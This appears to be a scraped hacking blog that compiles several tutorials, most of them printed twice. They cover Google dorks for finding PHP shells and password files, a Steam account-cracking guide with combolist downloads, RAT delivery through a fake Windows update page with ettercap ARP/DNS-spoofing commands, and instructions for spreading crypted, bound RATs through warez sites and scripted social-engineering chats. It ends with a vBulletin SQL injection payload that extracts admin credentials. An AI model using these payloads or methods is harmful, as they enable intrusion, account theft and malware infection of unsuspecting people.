9:01 AM
Yogesh Kashyap
get 3 months free key for Kaspersky Internet Security 2011
Well, Kaspersky Internet Security (KIS) is nowadays leading the security on the Internet and it is #1 desktop security software without any doubts. Well, Kaspersky Russia is giving away free promotion codes on Facebook, so hurry up and get your own code for free 3 months use of KIS 2011.
[FREE]-Get Free Internet in 2G 3G And Others[FREE] title
[FREE]-Get Free Internet in 2G 3G And Others[FREE] Here Is My New Tutorial How To get Free Internet for 2x 3x And Others Use PD-Proxy - VPN Tunneling Software This is fully tested on Tatadocomo and airtel And Iam Using n70 With tata docomo internet Go here And Make Your Account 1st http://adf.ly/1l0up Step 1. Install .NET Framework 3.5 - http://adf.ly/1l0KS 2. Download and unzip the binary at http://adf.ly/1l0cM 3. A messagebox will appear asking you if your system is running on a 32bit or a 64bit platform.
Gmail Hacker - Software to hack Gmail password
1. Download Gmail hacker software to hack Gmail password. http://www.4shared.com/file/175280640/863ac191/Gmail_Hack.html 2. Now, run Gmail Hacker Builder.exe file on your computer to see
How to Hack The Hackers CEH Tutorial
Hello friend I m Yogesh Mehra(GAMER) Well i will tell u how to hack the hacker or simply say track the hackerWink So here we start:- Many of them are affected by keylogger or torjan and all stroke is record and send to hacker ftp account or gmail account Angry So many them like how to find the hacker who has install the kelogger to his computer Most of hacker use ftp account to get key stroke recorded from victim computer like http://www.drivehq.com and many more Assume hacker have install a key logger to u r pc Confused now how to trace that hackerUndecided( when the keylogger is installed in your computer and it is sending key strokes it have to log in ftp account as the hacker has program it) Now u r thinking how to trace???Undecided here is some great tool like wireshark you can download from http://www.wireshark.org/ ( wireshark is an network monitoring tool which monitor what is going in you network)
Saturday, March 10, 2012
Find Passwords and Uploaded PHP Shells via Google using Private Dorks
Google can be used to find some shells and password to bypass the security and do anything being an admin of that website etc.
So here are the steps and Dorks are listed below too
Go to Google.com and type these Dorks, and you will got a Lot of uploaded shells in Google serach results !!
inurl:.php “cURL: ON MySQL: ON MSSQL: OFF”
“Shell” filetype:php intext:”uname -a:” “EDT 2010″
intitle:”intitle:r57shell” [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]
inurl:”c99.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:”c100.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:”Shell” inurl:”.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update
filetype:htpasswd htpasswd
intitle:”index of” “.htpasswd” -intitle:”dist” -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurlasslist.txt (para encontrar listas de passwords)
intitle:”index of..etc” passwd
intitle:admin intitle:login
“incorrect syntax near” (sql script error)
intitle:”the page cannot be found” inetmgr (debilidad en iis4)
intitle:index.of ws_ftp.ini
“supplied arguments is not a valid postgresql result” (possible debilidad sql)
_vti_pvt password intitle:index.of (frontpage)
inurl:backup intitle:index.of inurl:admin
“index of /backup”
index.of.password
index.of.winnt
inurl:”auth_user_file.txt”
“index of /admin”
“index of /password”
“index of /mail”
“index of /” +passwd
index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurlasswd filetype:txt
inurl:admin filetypeBig Grinb
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:”index of” .sh_history
intitle:”index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.1st
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members or accounts
intitle:”index of” user_carts or user _cart
So here are the steps and Dorks are listed below too
Go to Google.com and type these Dorks, and you will got a Lot of uploaded shells in Google serach results !!
Dorks for finding shells:
inurl:.php “cURL: ON MySQL: ON MSSQL: OFF”
“Shell” filetype:php intext:”uname -a:” “EDT 2010″
intitle:”intitle:r57shell” [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]
inurl:”c99.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:”c100.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:”Shell” inurl:”.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update
Dorks for finding Passwords:
filetype:htpasswd htpasswd
intitle:”index of” “.htpasswd” -intitle:”dist” -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurlasslist.txt (para encontrar listas de passwords)
intitle:”index of..etc” passwd
intitle:admin intitle:login
“incorrect syntax near” (sql script error)
intitle:”the page cannot be found” inetmgr (debilidad en iis4)
intitle:index.of ws_ftp.ini
“supplied arguments is not a valid postgresql result” (possible debilidad sql)
_vti_pvt password intitle:index.of (frontpage)
inurl:backup intitle:index.of inurl:admin
“index of /backup”
index.of.password
index.of.winnt
inurl:”auth_user_file.txt”
“index of /admin”
“index of /password”
“index of /mail”
“index of /” +passwd
index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurlasswd filetype:txt
inurl:admin filetypeBig Grinb
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:”index of” .sh_history
intitle:”index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.1st
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members or accounts
intitle:”index of” user_carts or user _cart
Download Art of Spectral Penetration Testing E-Book by James Codis | Download Free E-Book
Download Art of Spectral Penetration Testing E-Book by James Codis
This E-book will help you in advanced hacking attacks !
This e-book is published by Vineet Kumar a.k.a James Codis
So just start learning something advance in field of hacking from this e-book !
Saturday, August 6, 2011
How To Hack Steam Accounts [Detailed]
Hey HF, today I would like to share with you my favorite method for cracking steam accounts,
it took a while to write all this up so please leave a comment on how well you think I did on this thread or any feedback about this method, thanks.
"Steam Multi-Tool™ By HellraZer and Redskull"
"Steam Multi-Tool" is one of the best steams crackers available. It doesn't requires proxies, once started it keeps on working. No need of any extra tool. Just a combo list with : delimiter and you are set to go. It checks Steam Guarded accounts too, so that you won't lose anything. It shows a steam guarded account as valid, which other cracker's doesnt check and that makes this tool above them.
![[Image: proofjdp.png]](http://img202.imageshack.us/img202/3488/proofjdp.png)
Note : It doesn't use username and password list. Just Combo List with : delimiter (Delimiter = User:Pass Style)
Only Account Checker Tab works(it's also the only one you need). The other tabs dont work because of all the steam updates.
How it works :
1. Open Steam Multi-Tool as administator
2. Click On "Account Checker" Tab
![[Image: sc2uy.png]](http://img828.imageshack.us/img828/2032/sc2uy.png)
3. You can choose from single account or multiple accounts. If you are checking a specified account click on "Single account". If you are using a combolist list, click on "Multiple Accounts" and load it by clicking on the side button "..."
4. Uncheck Everything, just check "Use Timer" , and set it to 83 seconds.
Note : Steam bans any ip that login's alot of times in less than 83 seconds of time intervals. Keeping any less than 83 seconds will result in a ip ban from steam and checker won't be checking any accounts and stating all accounts as failed, even if though they were working. This may seem slow but if you just keep the program on all the time and leave it on overnight your sure to get accounts
5. Now, Click on "Load" , it will load your combolist (Ill explain the combolist later if you dont understad)
6. Now, Click on "Check". It will start checking for accounts.
Combo-List
Using someone else's combolist will most likely result in not gettting any accounts. They would probabaly be used or disabled/banned accounts.
Make a list Yourself by any method you can think of. (If enough people ask I will make another tutorial on how to make your own combolist, you can maybe google it and find something aswell, also if you really need you can PM me and I might make you a list depending on how busy I am)
Here is an example of my combolist
![[Image: combolist.png]](http://img219.imageshack.us/img219/4402/combolist.png)
And here is a picture of my success
Note: only like about %50 of the accounts you crack will have games on them
Cracking Tips:
1. If you get unverified accounts, and you want to verify them to your email. Never, ever verify multiple accounts to a single email. Not even two accounts on one email. All accounts verified to single email will be suspended by Steam, which are of no use then.
2. If you get an error stating "Steam is having trouble Connecting to Servers" while checking id's yourself. That's because steam has banned your ip for 1 hour. If you have a dynamic IP, you can just turn Off and On your modem or connection and you can continue the process. For others, you will have to wait for an hour, until steam unbans you.
Last Minute Notes
- Note : Dont run the program while your Steam is ON. Turn off steam and then load it.
Downloads:
Steam-Multi Tool
http://www.mediafire.com/?guy6r07777u3c4j
Password for the file: hackforums
Combolists:
http://www.mediafire.com/?b64d4l21bdwqroj
http://www.mediafire.com/?7u17mo7rf90n3b8
Note: these are average size combolists and im not guaranteeing you, you will get many accounts with these its always best to make your own
Thanks guys please leave any and all feedback it took me a while to write all this,
by the way this method was taught to me by Eth4nol, a good friend so im sorry if you guys wrote any similar threads, I looked around HF first to check there weren't any threads similar to this one.
Thanks To Wheelz_
it took a while to write all this up so please leave a comment on how well you think I did on this thread or any feedback about this method, thanks.
"Steam Multi-Tool™ By HellraZer and Redskull"
"Steam Multi-Tool" is one of the best steams crackers available. It doesn't requires proxies, once started it keeps on working. No need of any extra tool. Just a combo list with : delimiter and you are set to go. It checks Steam Guarded accounts too, so that you won't lose anything. It shows a steam guarded account as valid, which other cracker's doesnt check and that makes this tool above them.
Note : It doesn't use username and password list. Just Combo List with : delimiter (Delimiter = User:Pass Style)
Only Account Checker Tab works(it's also the only one you need). The other tabs dont work because of all the steam updates.
How it works :
1. Open Steam Multi-Tool as administator
2. Click On "Account Checker" Tab
3. You can choose from single account or multiple accounts. If you are checking a specified account click on "Single account". If you are using a combolist list, click on "Multiple Accounts" and load it by clicking on the side button "..."
4. Uncheck Everything, just check "Use Timer" , and set it to 83 seconds.
Note : Steam bans any ip that login's alot of times in less than 83 seconds of time intervals. Keeping any less than 83 seconds will result in a ip ban from steam and checker won't be checking any accounts and stating all accounts as failed, even if though they were working. This may seem slow but if you just keep the program on all the time and leave it on overnight your sure to get accounts
5. Now, Click on "Load" , it will load your combolist (Ill explain the combolist later if you dont understad)
6. Now, Click on "Check". It will start checking for accounts.
Combo-List
Using someone else's combolist will most likely result in not gettting any accounts. They would probabaly be used or disabled/banned accounts.
Make a list Yourself by any method you can think of. (If enough people ask I will make another tutorial on how to make your own combolist, you can maybe google it and find something aswell, also if you really need you can PM me and I might make you a list depending on how busy I am)
Here is an example of my combolist
And here is a picture of my success
Note: only like about %50 of the accounts you crack will have games on them
Cracking Tips:
1. If you get unverified accounts, and you want to verify them to your email. Never, ever verify multiple accounts to a single email. Not even two accounts on one email. All accounts verified to single email will be suspended by Steam, which are of no use then.
2. If you get an error stating "Steam is having trouble Connecting to Servers" while checking id's yourself. That's because steam has banned your ip for 1 hour. If you have a dynamic IP, you can just turn Off and On your modem or connection and you can continue the process. For others, you will have to wait for an hour, until steam unbans you.
Last Minute Notes
- Note : Dont run the program while your Steam is ON. Turn off steam and then load it.
Downloads:
Steam-Multi Tool
http://www.mediafire.com/?guy6r07777u3c4j
Password for the file: hackforums
Combolists:
http://www.mediafire.com/?b64d4l21bdwqroj
http://www.mediafire.com/?7u17mo7rf90n3b8
Note: these are average size combolists and im not guaranteeing you, you will get many accounts with these its always best to make your own
Thanks guys please leave any and all feedback it took me a while to write all this,
by the way this method was taught to me by Eth4nol, a good friend so im sorry if you guys wrote any similar threads, I looked around HF first to check there weren't any threads similar to this one.
Thanks To Wheelz_
How to get your rat onto a pc that's on the
This is how to get someone to download your rat if you're on the same network
This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..
Start by downloading backtrack 4 and burning the iso.
Boot into backtrack and open the file browser, and browse to /var/www/. There will be file called index.html.
Open it with kate (or some other text editor) delete the code that is in there and copy in the following code.
Now copy your rat into the same directory and name it windowsupdate.exe
Start apache
open firefox and navigate to 127.0.0.1. Your fake update page should show up.
Now set up the dns_spoofing configuraton
Replace 192.168.1.101 with your own ip (ifconfig)
Use nmap to find your target ip
Now arp-poison with ettercap using the dns_spoof plugin.
replace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.
If you want to target everyone on the network you can use the following command.
Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.
Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.
This will let them browse again.
This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..
Start by downloading backtrack 4 and burning the iso.
Code:
http://www.remote-exploit.org/backtrack_download.htmlBoot into backtrack and open the file browser, and browse to /var/www/. There will be file called index.html.
Open it with kate (or some other text editor) delete the code that is in there and copy in the following code.
Code:
Critical Vulnerability in Windows
XP, Vista, Windows 2000 detected. Download and installation of upgrade
required.
Now copy your rat into the same directory and name it windowsupdate.exe
Start apache
Code:
/etc/init.d/apache2 startopen firefox and navigate to 127.0.0.1. Your fake update page should show up.
Now set up the dns_spoofing configuraton
Code:
echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dnsReplace 192.168.1.101 with your own ip (ifconfig)
Use nmap to find your target ip
Code:
nmap -sP your_subnet/24Now arp-poison with ettercap using the dns_spoof plugin.
Code:
ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoofreplace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.
If you want to target everyone on the network you can use the following command.
Code:
ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoofNow every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.
Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.
Code:
ipconfig /flushdnsThis will let them browse again.
How to Spread Bots/Rats
Intro
----/---
When it comes too spreading your bot's and your rats, it can be
quite easy or challenging for the average retard. What people
do no understand is that spreading is very easy depending on the way
that you do it. Below, is a FEW methods on how to spread.
----/---
Methods
----/---
Torrents: A very common way too spread files over the net
--
P2P: A few very good example is Limewire
--
IM: If you do this mixed with a bit of SE you have a good chance of infecting the slave
--
Warez: If you have a nice account which is trusted, start spreading your RAT
--
Personal Site: Upload a few files which are in your sites category binded with your rat
--
VIP: If you have VIP on a site, either make a fake tool and bind with your RAT, or leech
off another VIP site and share with your binded RAT
--
Hacking Sites: Lets say you want too get.. Runescape (all discussion banned on HF) (all discussion banned on HF) (all discussion banned on HF) accounts. Find a autobot or somin
And bind your RAT and share on a Runescape (all discussion banned on HF) (all discussion banned on HF) (all discussion banned on HF) hacking site. This way
You have more of a chance of getting Runescape (all discussion banned on HF) (all discussion banned on HF) (all discussion banned on HF) accounts.
----/---
How-To V1
----/---
In this first How-To, I will show you how too spread via Warez (Very Easy And Basic).
But before we do that you will need to do the following:
Have a Rat
A Cryptor < Buy or Make One >
A Binder < Buy or Make One
A File too Share < Find off a trusted warez site
Now, your wondering what a Binder & Cryptor is. Well here is a quick personal definition of both.
Cryptor: You could say it Encrypts your RAT so that an AV can not find it, or say it Scrambles the code
So it seems like a unknown file too the AV.
Binder: You use these too bind 2 or more files together so that when the main .exe file is opened
All the files which you binded open at once eg. You bind: file.exe > rat.exe and when you open
file.exe all the files open at once.
* I reccommend that you either crypt the RAT first and then Bind and crypt again, or Bind and then Crypt.
Ok now lets move on. Crypt your rat and bind with the Warez application. Now, find a board which deals with
illegal sharing of warez, here is a list I put together:
http://www.warez-bb.org/ < Overused But People Are Retards >
http://www.wareznet.net/ < Apparently Good Too Spread >
http://www.sharestation.com/ < Build Trust, Get Good Post Count Then Spread >
http://www.katzforums.com/ < Alot of Bots Are On Here >
Ok, now that you found your warez forum you want too use signup and make a good post count, it is
not easy as a-b-c. I would reccommend that you get a post count of about 50+ and also get a nice
looking avater and signiture, it normally makes people want too trust you. Now that you have a good looking
post count you probbly want too post your binded warez in the appropriate section, but recently I have found
a good way of spreading which is by posting in the guest section, and hoping that it gets put onto a site
like:
katz.cd
phazeddl.com
Because 100's and 1000's of people vist these kinds of sites hourly, you got a good chance of potentional
victims visiting and downloading your binder warez and getting infected, but you have too make sure
that your RAT is crypted or you just fucked your chances up of even getting one slave. But here is another little
trick which has worked in the past for me.
Find a commonly used AV like.. Kaspersky, now find your crypted RAT with it. Now your thinking why a AV? Well this
is because sometimes your victims might have done a reinstall on XP and wanted a new AV, so post it on a few warez sites
and make a fake account with a nice looking post count and start too post how it works etc, also get a few friends
together and get them too get a high post count and get them too post how it works!
* You might want too do that on all your posts with you RAT binded
Now thats it for how to spread on a warez sites. Read below for how to spread on IM (Instant Messaging)
----/---
How-To V2
----/---
Ok, now when spreading by MSN,ICQ,YAHOO you need too have trust with who ever your spreading with or some very
good SE (Social Engineering). Now why SE? This helps when trying too trick your friend/slave into accepting
what you are saying and downloading your file from you. So here is a good little trick which has worked about 80%
of the time for me and I will share it. Also, you will need to know there personal interests which could include:
Gaming,Hacking,Programming. Your probbly starting too understand what I mean, so if you don't know find out, and
don't ask 'What are your interests?' say somin like ' What kinda stuff you into? i persoanlly like playing
world of warcraft' . So if they say somin like 'Yeh me too' you instantly found somthing they are interested in.
What You Need:
A Friend/slave on MSN/ICQ/YAHOO etc.
There interests
A fake website which is hosting your RAT
Your Rat Cryped or Crypted & Binded with a tool they need
Ok first we need to make a fake website, this may be alot of effort for conning one person, so I reccommend
that you have a group of victims which are into the same thing, which in ourcase will be WoW (World Of Warcraft).
Find a template for what they like 'World of Warcraft'.. (Google Is Your Fried)
Now, make up some bullshit about what they like on the website. So for World of Warcraft say somthing like you have found
a talent point calculater or you found a tool which Farms Gold for you, make sure it sounds genuine and for more
proof have a couple of screenshots which you can find anywhere in google etc. Now upload your .exe too the actual
site and have it as a 10min Free Trial or somthing like that so it sounds so much more genuine.
Now for the part in which you tell them about it and how it works etc.
M = Me
V = Vicim
----
M> Hey i just found this sweet bot which farms gold for you
M> I just used it and it farmed some cool epics which i sold for loads
V> Nice. where did you get i from, it sounds soo cool !
V> Also cant you get banned from doing stuff like this, and is it a virus
M> No, I scanned already
M> but if you get banned they have a unbanning tool on the site
M> Which removes the ban and allows you too play
M> Also i just farmed another sweet epic
V> What the site?
M> http://site.com/download
M> i am using the 10minute free trial! and it works like a charm
M> Planning on buying
V> Ok sweet, I downloaded it and i ran it and it opened some called Glider Bot
----
Ok, now thats now the best fake convo, but you probbly have goto grips of what I am trying to do here.
You can see that even though the guy said is it a virus, I give a fake link of a tool which i could call
trial which could be uploaded too virus total, and he even said that if you get banned there is a tool
to unban you. So you kidna understand how too get outa a hard situation
Now after all this has happened either block the slave, and move on. But you want too make sure your other
victims don't know each other because that could cause a problem for you.
----/---
End
----/---
----/---
When it comes too spreading your bot's and your rats, it can be
quite easy or challenging for the average retard. What people
do no understand is that spreading is very easy depending on the way
that you do it. Below, is a FEW methods on how to spread.
----/---
Methods
----/---
Torrents: A very common way too spread files over the net
--
P2P: A few very good example is Limewire
--
IM: If you do this mixed with a bit of SE you have a good chance of infecting the slave
--
Warez: If you have a nice account which is trusted, start spreading your RAT
--
Personal Site: Upload a few files which are in your sites category binded with your rat
--
VIP: If you have VIP on a site, either make a fake tool and bind with your RAT, or leech
off another VIP site and share with your binded RAT
--
Hacking Sites: Lets say you want too get.. Runescape (all discussion banned on HF) (all discussion banned on HF) (all discussion banned on HF) accounts. Find a autobot or somin
And bind your RAT and share on a Runescape (all discussion banned on HF) (all discussion banned on HF) (all discussion banned on HF) hacking site. This way
You have more of a chance of getting Runescape (all discussion banned on HF) (all discussion banned on HF) (all discussion banned on HF) accounts.
----/---
How-To V1
----/---
In this first How-To, I will show you how too spread via Warez (Very Easy And Basic).
But before we do that you will need to do the following:
Have a Rat
A Cryptor < Buy or Make One >
A Binder < Buy or Make One
A File too Share < Find off a trusted warez site
Now, your wondering what a Binder & Cryptor is. Well here is a quick personal definition of both.
Cryptor: You could say it Encrypts your RAT so that an AV can not find it, or say it Scrambles the code
So it seems like a unknown file too the AV.
Binder: You use these too bind 2 or more files together so that when the main .exe file is opened
All the files which you binded open at once eg. You bind: file.exe > rat.exe and when you open
file.exe all the files open at once.
* I reccommend that you either crypt the RAT first and then Bind and crypt again, or Bind and then Crypt.
Ok now lets move on. Crypt your rat and bind with the Warez application. Now, find a board which deals with
illegal sharing of warez, here is a list I put together:
http://www.warez-bb.org/ < Overused But People Are Retards >
http://www.wareznet.net/ < Apparently Good Too Spread >
http://www.sharestation.com/ < Build Trust, Get Good Post Count Then Spread >
http://www.katzforums.com/ < Alot of Bots Are On Here >
Ok, now that you found your warez forum you want too use signup and make a good post count, it is
not easy as a-b-c. I would reccommend that you get a post count of about 50+ and also get a nice
looking avater and signiture, it normally makes people want too trust you. Now that you have a good looking
post count you probbly want too post your binded warez in the appropriate section, but recently I have found
a good way of spreading which is by posting in the guest section, and hoping that it gets put onto a site
like:
katz.cd
phazeddl.com
Because 100's and 1000's of people vist these kinds of sites hourly, you got a good chance of potentional
victims visiting and downloading your binder warez and getting infected, but you have too make sure
that your RAT is crypted or you just fucked your chances up of even getting one slave. But here is another little
trick which has worked in the past for me.
Find a commonly used AV like.. Kaspersky, now find your crypted RAT with it. Now your thinking why a AV? Well this
is because sometimes your victims might have done a reinstall on XP and wanted a new AV, so post it on a few warez sites
and make a fake account with a nice looking post count and start too post how it works etc, also get a few friends
together and get them too get a high post count and get them too post how it works!
* You might want too do that on all your posts with you RAT binded
Now thats it for how to spread on a warez sites. Read below for how to spread on IM (Instant Messaging)
----/---
How-To V2
----/---
Ok, now when spreading by MSN,ICQ,YAHOO you need too have trust with who ever your spreading with or some very
good SE (Social Engineering). Now why SE? This helps when trying too trick your friend/slave into accepting
what you are saying and downloading your file from you. So here is a good little trick which has worked about 80%
of the time for me and I will share it. Also, you will need to know there personal interests which could include:
Gaming,Hacking,Programming. Your probbly starting too understand what I mean, so if you don't know find out, and
don't ask 'What are your interests?' say somin like ' What kinda stuff you into? i persoanlly like playing
world of warcraft' . So if they say somin like 'Yeh me too' you instantly found somthing they are interested in.
What You Need:
A Friend/slave on MSN/ICQ/YAHOO etc.
There interests
A fake website which is hosting your RAT
Your Rat Cryped or Crypted & Binded with a tool they need
Ok first we need to make a fake website, this may be alot of effort for conning one person, so I reccommend
that you have a group of victims which are into the same thing, which in ourcase will be WoW (World Of Warcraft).
Find a template for what they like 'World of Warcraft'.. (Google Is Your Fried)
Now, make up some bullshit about what they like on the website. So for World of Warcraft say somthing like you have found
a talent point calculater or you found a tool which Farms Gold for you, make sure it sounds genuine and for more
proof have a couple of screenshots which you can find anywhere in google etc. Now upload your .exe too the actual
site and have it as a 10min Free Trial or somthing like that so it sounds so much more genuine.
Now for the part in which you tell them about it and how it works etc.
M = Me
V = Vicim
----
M> Hey i just found this sweet bot which farms gold for you
M> I just used it and it farmed some cool epics which i sold for loads
V> Nice. where did you get i from, it sounds soo cool !
V> Also cant you get banned from doing stuff like this, and is it a virus
M> No, I scanned already
M> but if you get banned they have a unbanning tool on the site
M> Which removes the ban and allows you too play
M> Also i just farmed another sweet epic
V> What the site?
M> http://site.com/download
M> i am using the 10minute free trial! and it works like a charm
M> Planning on buying
V> Ok sweet, I downloaded it and i ran it and it opened some called Glider Bot
----
Ok, now thats now the best fake convo, but you probbly have goto grips of what I am trying to do here.
You can see that even though the guy said is it a virus, I give a fake link of a tool which i could call
trial which could be uploaded too virus total, and he even said that if you get banned there is a tool
to unban you. So you kidna understand how too get outa a hard situation
Now after all this has happened either block the slave, and move on. But you want too make sure your other
victims don't know each other because that could cause a problem for you.
----/---
End
----/---
Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day# Google Dork: intitle: powered by Vbulletin 4 |
# Date: 20/07/2011 |
# Author: FB1H2S |
# Software Link: [[url]http://www.vbulletin.com/][/url] |
# Version: [4.x.x] |
# Tested on: [relevant os] |
# CVE : [[url]http://members.vbulletin.com/][/url] |
###################################################################################################### |
Vulnerability: |
###################################################################################################### |
Vbulletin
4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in
parameter "&messagegroupid" due to improper input validation. |
##################################################################################################### |
Vulnerable Code: |
##################################################################################################### |
File: /vbforum/search/type/socialgroupmessage.php |
Line No: 388 |
Paramater : messagegroupid |
|
if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0) |
{ |
$value = $registry->GPC['messagegroupid']; |
if (!is_array($value)) |
{ |
$value = array($value); |
} |
if (!(in_array(' ',$value) OR in_array('',$value))) |
{ |
if ($rst = $vbulletin->db->query_read(" |
SELECT socialgroup.name |
FROM " . TABLE_PREFIX."socialgroup AS socialgroup |
---> WHERE socialgroup.groupid IN (" . implode(', ', $value) .")") |
|
} |
############################################################################################ |
Exploitation: |
############################################################################################ |
Post data on: -->search.php?search_type=1 |
--> Search Single Content Type |
Keywords : Valid Group Message |
Search Type : Group Messages |
Search in Group : Valid Group Id |
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# |
########################################################################################## |
More Details: |
########################################################################################## |
Http://www.Garage4Hackers.com |
http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day |
########################################################################################### |
Note: |
########################################################################################### |
Funny
part was that, a similar bug was found in the same module, search query
two months back. Any way Vbulletin has released a patch as it was
reported to them by altex, hence |
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. 
